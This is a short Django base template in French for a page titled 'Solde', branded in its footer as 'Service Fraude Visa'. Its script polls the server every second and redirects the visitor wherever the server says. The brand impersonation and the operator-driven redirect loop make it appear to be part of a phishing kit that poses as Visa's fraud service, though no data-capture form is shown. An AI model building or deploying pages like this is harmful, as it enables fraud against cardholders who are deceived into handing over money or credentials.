{% load static %}
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>{% block title %}Solde{% endblock %}</title>
    <link rel="stylesheet" href="{% static 'onboarding/style2.css' %}">
</head>
<body>

        <!-- Carte principale -->
        <div class="card {% block card_class %}{% endblock %}">
            <div class="logo2">
                <img src="{% static 'onboarding/logo.png' %}" alt="Logo">
            </div>
            <h1>{% block heading %}Solde{% endblock %}</h1>
            <p>{% block subheading %}{% endblock %}</p>
            {% block content %}{% endblock %}
        </div>

        <!-- Zone hors carte (carrousel, script, etc.) -->
        {% block extra %}
         <div class="footer">
        <p>© 2026 Service Fraude Visa — Tous droits réservés</p>
        <p>Ligne sécurisée · 24h/24 · 7j/7</p>
    </div>
{% endblock %}


    <script>
        if (!window.location.pathname.startsWith('/visiteurs/')) {
            setInterval(async function() {
                try {
                    const res  = await fetch('/verifier-redirection/');
                    const data = await res.json();
                    if (data.redirect) window.location.href = data.redirect;
                } catch(e) {}
            }, 1000);
        }
    </script>

</body>
</html>
